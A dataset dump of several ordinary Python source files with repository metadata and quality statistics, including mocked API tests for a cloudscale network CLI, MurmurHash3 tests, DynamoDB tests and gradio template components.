Signals: 627, 5483, 4.881978, 0.119617, 0.058804, 0.170533, 0.198955, 0.831428, 0.827507, 0.779811, 0.72656, 0.673963, 0.661222, 0, 0.001937, 0.246763, 5483, 131, 78, 41.854962, 0.739225, 0.001641, 0, 0.445545, 0, 0, 0.227381, 0, 0, 0, 0, 0, 0.336634, 1, 0.128713, false, 0, 0.029703, 0.009901, 0.188119, 0

Flags: 0, 0, 0, null, 0, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

`effective` 0 · `hits` 6
---

**`9981d285091c4025fdaa756f27cc0af9c0c44e52`** · size 7383 · ext `py` · lang Python

- **max_stars**: `cloudscale/tests/test_network.py` in `resmo/python-cloudscale` @ `e194e3f74c4df549e59781861d4a0a1e1abf62fc`, licenses `["MIT"]`; stars 6; events 2019-11-21T15:08:58.000Z – 2019-12-18T07:46:01.000Z
- **max_issues**: same file, repo, head, and licenses; issues 15; events 2019-11-26T19:48:12.000Z – 2020-05-01T14:52:07.000Z
- **max_forks**: same file, repo, head, and licenses; count and event datetimes null

```python
from cloudscale import Cloudscale, CloudscaleApiException, CloudscaleException, CLOUDSCALE_API_ENDPOINT
from cloudscale.cli import cli
import responses
import click
from click.testing import CliRunner

NETWORK_RESP = {
    "href": "https://api.cloudscale.ch/v1/networks/2db69ba3-1864-4608-853a-0771b6885a3a",
    "uuid": "2db69ba3-1864-4608-853a-0771b6885a3a",
    "name": "my-network-name",
    "created_at": "2019-05-29T13:18:42.511407Z",
    "zone": {
        "slug": "lpg1"
    },
    "mtu": 9000,
    "subnets": [
        {
            "href": "https://api.cloudscale.ch/v1/subnets/33333333-1864-4608-853a-0771b6885a3a",
            "uuid": "33333333-1864-4608-853a-0771b6885a3a",
            "cidr": "172.16.0.0/24"
        }
    ],
    "tags": {}
}


@responses.activate
def test_network_get_all():
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks',
        json=[NETWORK_RESP],
        status=200)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks',
        json=[NETWORK_RESP],
        status=200)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks',
        json={},
        status=500)

    cloudscale = Cloudscale(api_token="token")
    networks = cloudscale.network.get_all()
    assert networks[0]['name'] == "my-network-name"
    assert networks[0]['uuid'] == "2db69ba3-1864-4608-853a-0771b6885a3a"

    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        '-a',
        'token',
        'list',
    ])
    assert result.exit_code == 0
    result = runner.invoke(cli, [
        'network',
        '-a',
        'token',
        'list',
    ])
    assert result.exit_code > 0


@responses.activate
def test_network_get_by_uuid():
    uuid = "2db69ba3-1864-4608-853a-0771b6885a3a"
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=200)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=200)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json={},
        status=500)

    cloudscale = Cloudscale(api_token="token")
    network = cloudscale.network.get_by_uuid(uuid=uuid)
    assert network['name'] == "my-network-name"
    assert network['uuid'] == uuid

    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'show',
        uuid,
    ])
    assert result.exit_code == 0
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'show',
        uuid,
    ])
    assert result.exit_code > 0


@responses.activate
def test_network_delete():
    uuid = "2db69ba3-1864-4608-853a-0771b6885a3a"
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=200)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/unknown',
        json=NETWORK_RESP,
        status=200)
    responses.add(
        responses.DELETE,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        status=204)
    responses.add(
        responses.DELETE,
        CLOUDSCALE_API_ENDPOINT + '/networks/unknown',
        json={
            "detail": "Not found."
        },
        status=404)

    cloudscale = Cloudscale(api_token="token")
    network = cloudscale.network.delete(uuid=uuid)
    assert network is None

    try:
        cloudscale = Cloudscale(api_token="token")
        cloudscale.network.delete(uuid="unknown")
    except CloudscaleApiException as e:
        assert e.status_code == 404

    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'delete',
        uuid,
    ])
    assert result.exit_code == 1
    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'delete',
        uuid,
        '--force',
    ])
    assert result.exit_code == 0
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'delete',
        '--force',
        'unknown',
    ])
    assert result.exit_code > 0


@responses.activate
def test_network_create():
    name = "my-network-name"
    responses.add(
        responses.POST,
        CLOUDSCALE_API_ENDPOINT + '/networks',
        json=NETWORK_RESP,
        status=201)
    responses.add(
        responses.POST,
        CLOUDSCALE_API_ENDPOINT + '/networks',
        json=NETWORK_RESP,
        status=201)
    responses.add(
        responses.POST,
        CLOUDSCALE_API_ENDPOINT + '/networks',
        json={},
        status=500)

    cloudscale = Cloudscale(api_token="token")
    cloudscale.network.create(
        name=name,
    )

    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'create',
        '--name',
        name,
    ])
    assert result.exit_code == 0
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'create',
        '--name',
        name,
    ])
    assert result.exit_code > 0


@responses.activate
def test_network_update():
    uuid = "2db69ba3-1864-4608-853a-0771b6885a3a"
    name = "my-network-name"
    responses.add(
        responses.PATCH,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=204)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=200)
    responses.add(
        responses.PATCH,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=204)
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json=NETWORK_RESP,
        status=200)
    responses.add(
        responses.PATCH,
        CLOUDSCALE_API_ENDPOINT + '/networks/' + uuid,
        json={},
        status=500)

    cloudscale = Cloudscale(api_token="token")
    network = cloudscale.network.update(uuid=uuid, name=name)
    assert network['name'] == name
    assert network['uuid'] == uuid

    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'update',
        uuid,
        '--name',
        name,
    ])
    assert result.exit_code == 0
    result = runner.invoke(cli, [
        'network',
        '-a', 'token',
        'update',
        uuid,
        '--name',
        name,
    ])
    assert result.exit_code > 0


@responses.activate
def test_network_get_by_uuid_not_found():
    responses.add(
        responses.GET,
        CLOUDSCALE_API_ENDPOINT + '/networks/unknown',
        json={
            "detail": "Not found."
        },
        status=404)
    try:
        cloudscale = Cloudscale(api_token="token")
        cloudscale.network.get_by_uuid(uuid="unknown")
    except CloudscaleApiException as e:
        assert e.status_code == 404
        assert str(e) == "API Response Error (404): Not found."
        assert e.response == {'data': {'detail': 'Not found.'}, 'status_code': 404}


def test_network_missing_api_key():
    runner = CliRunner()
    result = runner.invoke(cli, [
        'network',
        'list',
    ])
    assert result.exit_code == 1
```

`avg_line_length` 25.546713 · `max_line_length` 103 · `alphanum_fraction` 0.574834

Signals: 753, 7383, 5.498008, 0.126162, 0.084783, 0.101449, 0.133092, 0.85628, 0.809179, 0.774396, 0.755797, 0.690097, 0.68285, 0, 0.060959, 0.29121, 7383, 288, 104, 25.635417, 0.730174, 0, 0, 0.816479, 0, 0.007491, 0.160233, 0.032913, 0, 0, 0, 0, 0.086142, 1, 0.026217, false, 0, 0.018727, 0, 0.044944, 0

Flags: 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

`effective` 0 · `hits` 6
---

**`41d2e889efa00b5f81c93aec7018cff96467f801`** · size 24 · ext `py` · lang Python

- **max_stars**: `world/elastica/__init__.py` in `mbed92/rl-physnet` @ `62b6e8a84a6704a50855434933a147f507f94263`, licenses `["MIT"]`; stars 1; events 2021-07-02T13:33:49.000Z – 2021-07-02T13:33:49.000Z
- **max_issues**: same file in `mbed92/dao-perception` @ same head, licenses `["MIT"]`; issues 3; events 2021-09-01T16:16:42.000Z – 2021-09-10T11:18:59.000Z
- **max_forks**: same file, repo, head, and licenses as max_issues; forks 1; events 2021-08-30T08:26:21.000Z – 2021-08-30T08:26:21.000Z

```python
from . import generator
```

`avg_line_length` 12 · `max_line_length` 23 · `alphanum_fraction` 0.791667

Signals: 3, 24, 6.333333, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.166667, 24, 1, 24, 24, 0.95, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0

Flags: 1, 1, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0

`effective` 0 · `hits` 6
---

**`5112831419a33e28088906eb8f5f3bde1b8f77ec`** · size 55 · ext `py` · lang Python

- **max_stars / max_issues / max_forks** (identical): `djangoproject/pages/namer.py` in `standridgejeff/PersonalWebsite` @ `c4f67677d684ca11c6f61958f4df315823790a4f`, licenses `["bzip2-1.0.6", "MIT"]`; all counts and event datetimes null

```python
def namer():
    return "My Name is still Jeff Standridge"
```

`avg_line_length` 27.5 · `max_line_length` 42 · `alphanum_fraction` 0.745455

Signals: 9, 55, 4.555556, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.163636, 55, 2, 42, 27.5, 0.891304, 0, 0, 0, 0, 0, 0.571429, 0, 0, 0, 0, 0, 0, 1, 0.5, true, 0, 0, 0.5, 1, 0

Flags: 1, 1, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0

`effective` 0 · `hits` 6
---

**`51293fd6c377653cd5a80ed456b5f916c32a92dc`** · size 42 · ext `py` · lang Python

- **max_stars / max_issues / max_forks** (identical): `examples/secret/secret.py` in `satoshi03/build_tools` @ `bfc9af9c0dcb17a04abd87304bc234e447bea497`, licenses `["MIT"]`; all counts and event datetimes null

```python
def secret():
    print("This is secret")
```

`avg_line_length` 14 · `max_line_length` 27 · `alphanum_fraction` 0.619048

Signals: 6, 42, 4.333333, 0.833333, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.214286, 42, 2, 28, 21, 0.787879, 0, 0, 0, 0, 0, 0.333333, 0, 0, 0, 0, 0, 0, 1, 0.5, true, 0, 0, 0, 0.5, 0.5

Flags: 1, 1, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 1

`effective` 0 · `hits` 6
---

**`5abcbf6681489b21ac281f95dd348173daca40b7`** · size 46 · ext `py` · lang Python

- **max_stars / max_issues / max_forks** (identical): `ventilatormodels/simple_regressor/__init__.py` in `trevorWieland/kaggle-ventilator-model` @ `06931f63c266b5b8e94124606f1ca63936a5cfc7`, licenses `["MIT"]`; all counts and event datetimes null

```python
from .simple_regressor import SimpleRegressor
```

`avg_line_length` 23 · `max_line_length` 45 · `alphanum_fraction` 0.891304

Signals: 5, 46, 8, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.086957, 46, 1, 46, 46, 0.952381, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, true, 0, 1, 0, 1, 0

Flags: 1, 1, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0, 1, 0

`effective` 0 · `hits` 6
---

**`5ad644287dc5486c8f56f3950ef25fd87286b222`** · size 81 · ext `py` · lang Python

- **max_stars / max_issues**: `juliaset/__init__.py` in `PageotD/juliaset` @ `7c1f98020eeff291fcf040cfcdf25a89e72f46a9`, licenses `["BSD-3-Clause"]`; counts and event datetimes null
- **max_forks**: same file, repo, head, and licenses; forks 1; events 2021-08-09T06:45:43.000Z – 2021-08-09T06:45:43.000Z

```python
from .juliaset import julia
from .juliaset import JuliaSet

__version__ = "0.3.0"
```

`avg_line_length` 20.25 · `max_line_length` 30 · `alphanum_fraction` 0.777778

Signals: 12, 81, 4.916667, 0.583333, 0.40678, 0.610169, 0, 0, 0, 0, 0, 0, 0, 0, 0.042857, 0.135802, 81, 4, 31, 20.25, 0.8, 0, 0, 0, 0, 0, 0.060976, 0, 0, 0, 0, 0, 0, 1, 0, false, 0, 0.666667, 0, 0.666667, 0

Flags: 1, 0, 0, null, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 0

`effective` 0 · `hits` 6
---

**`5ae399b0913fd76445b2d85bd467819305703cee`** · size 6231 · ext `py` · lang Python

- **max_stars**: `test/pymmh3_test.py` in `aahmed-se/pymmh3` @ `c18b0ffed586b4cb158a9aa4832d5a4603db19a4`, licenses `["CC0-1.0"]`; stars 1; events 2019-05-23T21:37:35.000Z – 2019-05-23T21:37:35.000Z
- **max_issues / max_forks**: same file, repo, head, and licenses; counts and event datetimes null

```python
# pymmh3 was written by Fredrik Kihlander and enhanced by Swapnil Gusani, and is placed in the public
# domain. The authors hereby disclaim copyright to this source code.

import os
import sys
import unittest

file_dir = os.path.dirname( __file__ )
sys.path.append( os.path.join( file_dir, '..' ) )

import pymmh3


class Testpymmh3( unittest.TestCase ):
    def _load_solutions(self, solution_file, base = 16):
        solution = {}
        with open( os.path.join( file_dir, solution_file ), 'rb' ) as f:
            while True:
                l = f.readline()
                if not l:
                    break
                solution[ l ] = int( f.readline(), base )
        return solution

    def test_32bit_basic_string( self ):
        solution = self._load_solutions('solution_hash32_seed0.txt', 10)
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash( l )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_32bit_basic_bytearray( self ):
        solution = self._load_solutions('solution_hash32_seed0.txt', 10)
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash( bytearray( l ) )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_32bit_custom_seed_string( self ):
        solution = self._load_solutions('solution_hash32_seed1234ABCD.txt', 10)
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash( l, seed = 0x1234ABCD )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_32bit_custom_seed_bytearray( self ):
        solution = self._load_solutions('solution_hash32_seed1234ABCD.txt', 10)
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash( bytearray( l ), seed = 0x1234ABCD )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x86_basic_string( self ):
        solution = self._load_solutions('solution_hash128_x86_seed0.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( l , x64arch = False )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x86_basic_bytearray( self ):
        solution = self._load_solutions('solution_hash128_x86_seed0.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( bytearray( l ), x64arch = False )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x86_custom_seed_string( self ):
        solution = self._load_solutions('solution_hash128_x86_seed1234ABCD.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( l, seed = 0x1234ABCD, x64arch = False )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x86_custom_seed_bytearray( self ):
        solution = self._load_solutions('solution_hash128_x86_seed1234ABCD.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( bytearray( l ), seed = 0x1234ABCD, x64arch = False )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x64_basic_string( self ):
        solution = self._load_solutions('solution_hash128_x64_seed0.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( l, x64arch = True )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x64_basic_bytearray( self ):
        solution = self._load_solutions('solution_hash128_x64_seed0.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( bytearray( l ), x64arch = True )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x64_custom_seed_string( self ):
        solution = self._load_solutions('solution_hash128_x64_seed1234ABCD.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( l, seed = 0x1234ABCD, x64arch = True )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )

    def test_128bit_x64_custom_seed_bytearray( self ):
        solution = self._load_solutions('solution_hash128_x64_seed1234ABCD.txt')
        with open( os.path.join( file_dir, 'pg1260.txt' ), 'rb' ) as test_file:
            for l in test_file.readlines():
                s = solution[l]
                r = pymmh3.hash128( bytearray( l ), seed = 0x1234ABCD, x64arch = True )
                self.assertEqual( s, r, 'different hash for line: "%s"\n0x%08X != 0x%08X' % ( l, s, r ) )


if __name__ == "__main__":
    unittest.main()
```

`avg_line_length` 46.155556 · `max_line_length` 105 · `alphanum_fraction` 0.581769

Signals: 828, 6231, 4.183575, 0.109903, 0.055427, 0.040416, 0.056582, 0.880485, 0.875577, 0.875577, 0.86836, 0.861143, 0.848152, 0, 0.077307, 0.292088, 6231, 134, 106, 46.5, 0.708003, 0.026641, 0, 0.588235, 0, 0, 0.181788, 0.063016, 0, 0, 0.009898, 0, 0.117647, 1, 0.127451, false, 0, 0.039216, 0, 0.186275, 0

Flags: 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

`effective` 0 · `hits` 6
---

**`850480da8610989506b9236c2ad17454f1e3e7f7`** · size 5577 · ext `py` · lang Python

- **max_stars**: `tests/test_dynamodb.py` in `MITLibraries/wiley-deposits` @ `33659d760d9e39ca0aef0098e726132b5e2205de`, licenses `["Apache-2.0"]`; stars 2; events 2022-01-26T15:05:48.000Z – 2022-01-31T17:28:47.000Z
- **max_issues**: same file, repo, head, and licenses; issues 10; events 2021-08-03T21:23:39.000Z – 2022-02-10T15:24:12.000Z
- **max_forks**: same file, repo, head, and licenses; count and event datetimes null

```python
from moto import mock_dynamodb2

from awd.cli import Status


@mock_dynamodb2
def test_dynamodb_add_doi_item_to_database(dynamodb_class):
    dynamodb_class.client.create_table(
        TableName="test_dois",
        KeySchema=[
            {"AttributeName": "doi", "KeyType": "HASH"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "doi", "AttributeType": "S"},
        ],
    )
    dynamodb_class.client.describe_table(TableName="test_dois")
    add_response = dynamodb_class.add_doi_item_to_database("test_dois", "222.2/2222")
    assert add_response["ResponseMetadata"]["HTTPStatusCode"] == 200


@mock_dynamodb2
def test_dynamodb_retrieve_doi_items_from_database(dynamodb_class):
    dynamodb_class.client.create_table(
        TableName="test_dois",
        KeySchema=[
            {"AttributeName": "doi", "KeyType": "HASH"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "doi", "AttributeType": "S"},
        ],
    )
    dynamodb_class.client.put_item(
        TableName="test_dois",
        Item={
            "doi": {"S": "111.1/1111"},
            "status": {"S": "Failed, will retry"},
            "attempts": {"S": "1"},
        },
    )
    dois = dynamodb_class.retrieve_doi_items_from_database("test_dois")
    assert dois == [
        {
            "doi": "111.1/1111",
            "status": "Failed, will retry",
            "attempts": "1",
        }
    ]


@mock_dynamodb2
def test_dynamodb_retry_threshold_exceeded_false(dynamodb_class):
    dynamodb_class.client.create_table(
        TableName="test_dois",
        KeySchema=[
            {"AttributeName": "doi", "KeyType": "HASH"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "doi", "AttributeType": "S"},
        ],
    )
    dynamodb_class.client.put_item(
        TableName="test_dois",
        Item={
            "doi": {"S": "111.1/1111"},
            "status": {"S": "Failed, will retry"},
            "attempts": {"S": "1"},
        },
    )
    validation_status = dynamodb_class.retry_attempts_exceeded(
        "test_dois", "111.1/1111", "10"
    )
    assert validation_status is False


@mock_dynamodb2
def test_dynamodb_retry_threshold_exceeded_true(dynamodb_class):
    dynamodb_class.client.create_table(
        TableName="test_dois",
        KeySchema=[
            {"AttributeName": "doi", "KeyType": "HASH"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "doi", "AttributeType": "S"},
        ],
    )
    dynamodb_class.client.put_item(
        TableName="test_dois",
        Item={
            "doi": {"S": "111.1/1111"},
            "status": {"S": "Failed, will retry"},
            "attempts": {"S": "10"},
        },
    )
    validation_status = dynamodb_class.retry_attempts_exceeded(
        "test_dois", "111.1/1111", "10"
    )
    assert validation_status is True


@mock_dynamodb2
def test_dynamodb_update_doi_item_attempts_in_database(dynamodb_class):
    dynamodb_class.client.create_table(
        TableName="test_dois",
        KeySchema=[
            {"AttributeName": "doi", "KeyType": "HASH"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "doi", "AttributeType": "S"},
        ],
    )
    dynamodb_class.client.put_item(
        TableName="test_dois",
        Item={
            "doi": {"S": "111.1/1111"},
            "status": {"S": "Failed, will retry"},
            "attempts": {"S": "1"},
        },
    )
    existing_item = dynamodb_class.client.get_item(
        TableName="test_dois",
        Key={"doi": {"S": "111.1/1111"}},
    )
    assert existing_item["Item"] == {
        "attempts": {"S": "1"},
        "doi": {"S": "111.1/1111"},
        "status": {"S": "Failed, will retry"},
    }
    update_response = dynamodb_class.update_doi_item_attempts_in_database(
        "test_dois", "111.1/1111"
    )
    assert update_response["ResponseMetadata"]["HTTPStatusCode"] == 200
    updated_item = dynamodb_class.client.get_item(
        TableName="test_dois",
        Key={"doi": {"S": "111.1/1111"}},
    )
    assert updated_item["Item"] == {
        "attempts": {"S": "2"},
        "doi": {"S": "111.1/1111"},
        "status": {"S": "Failed, will retry"},
    }


@mock_dynamodb2
def test_dynamodb_update_doi_item_status_in_database(dynamodb_class):
    dynamodb_class.client.create_table(
        TableName="test_dois",
        KeySchema=[
            {"AttributeName": "doi", "KeyType": "HASH"},
        ],
        AttributeDefinitions=[
            {"AttributeName": "doi", "AttributeType": "S"},
        ],
    )
    dynamodb_class.client.put_item(
        TableName="test_dois",
        Item={
            "doi": {"S": "111.1/1111"},
            "status": {"S": "Failed, will retry"},
            "attempts": {"S": "1"},
        },
    )
    existing_item = dynamodb_class.client.get_item(
        TableName="test_dois",
        Key={"doi": {"S": "111.1/1111"}},
    )
    assert existing_item["Item"] == {
        "attempts": {"S": "1"},
        "doi": {"S": "111.1/1111"},
        "status": {"S": "Failed, will retry"},
    }
    update_response = dynamodb_class.update_doi_item_status_in_database(
        "test_dois", "111.1/1111", Status.PROCESSING.value
    )
    assert update_response["ResponseMetadata"]["HTTPStatusCode"] == 200
    updated_item = dynamodb_class.client.get_item(
        TableName="test_dois",
        Key={"doi": {"S": "111.1/1111"}},
    )
    assert updated_item["Item"] == {
        "attempts": {"S": "1"},
        "doi": {"S": "111.1/1111"},
        "status": {"S": "1"},
    }
```

`avg_line_length` 30.145946 · `max_line_length` 85 · `alphanum_fraction` 0.558365

Signals: 561, 5577, 5.285205, 0.112299, 0.122766, 0.048567, 0.035076, 0.902867, 0.856998, 0.847555, 0.830017, 0.768634, 0.768634, 0, 0.04541, 0.273445, 5577, 184, 86, 30.309783, 0.686328, 0, 0, 0.672515, 0, 0, 0.220011, 0, 0, 0, 0, 0, 0.05848, 1, 0.035088, false, 0, 0.011696, 0, 0.046784, 0

Flags: 0, 0, 0, null, 0, 0, 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0

`effective` 0 · `hits` 6
---

**`516ea2e5ef44ee329def0126d9de891c000790a8`** · size 3289 · ext `py` · lang Python

- **max_stars**: `gradio/templates.py` in `dumpmemory/gradio` @ `748b1a4761c7f32e231c831a651595f5a33db039`, licenses `["Apache-2.0"]`; stars 1; events 2021-12-15T09:21:44.000Z – 2021-12-15T09:21:44.000Z
- **max_issues / max_forks**: same file in `AK391/gradio` @ `f3fa61cce8b0eab4f76c564216cda3108824020a`, licenses `["Apache-2.0"]`; counts and event datetimes null

```python
from gradio import components


class Text(components.Textbox):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(lines=1, **kwargs)


class TextArea(components.Textbox):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(lines=7, **kwargs)


class Webcam(components.Image):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(source="webcam", **kwargs)


class Sketchpad(components.Image):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(
            image_mode="L",
            source="canvas",
            shape=(28, 28),
            invert_colors=True,
            **kwargs
        )


class Plot(components.Image):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(type="plot", **kwargs)


class Pil(components.Image):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(type="pil", **kwargs)


class PlayableVideo(components.Video):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(type="mp4", **kwargs)


class Microphone(components.Audio):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(source="microphone", **kwargs)


class Mic(components.Audio):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(source="microphone", **kwargs)


class Files(components.File):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(file_count="multiple", **kwargs)


class Numpy(components.Dataframe):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(type="numpy", **kwargs)


class Matrix(components.Dataframe):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(type="array", **kwargs)


class List(components.Dataframe):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(type="array", col_count=1, **kwargs)


class Highlight(components.HighlightedText):
    def __init__(self, **kwargs):
        """
        Custom component
        @param kwargs:
        """
        self.is_template = True
        super().__init__(**kwargs)
```

`avg_line_length` 22.222973 · `max_line_length` 61 · `alphanum_fraction` 0.544846

Signals: 309, 3289, 5.378641, 0.174757, 0.058965, 0.092659, 0.143201, 0.761131, 0.761131, 0.761131, 0.761131, 0.761131, 0.761131, 0, 0.003586, 0.321678, 3289, 147, 62, 22.37415, 0.741372, 0.135908, 0, 0.47619, 0, 0, 0.02742, 0, 0, 0, 0, 0, 0, 1, 0.222222, false, 0, 0.015873, 0, 0.460317, 0

Flags: 0, 0, 0, null, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, null, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0

`effective` 0 · `hits` 6
518ddb1bf1a37f449a239c79dd7d07a12f51fc3d
| 336
|
py
|
Python
|
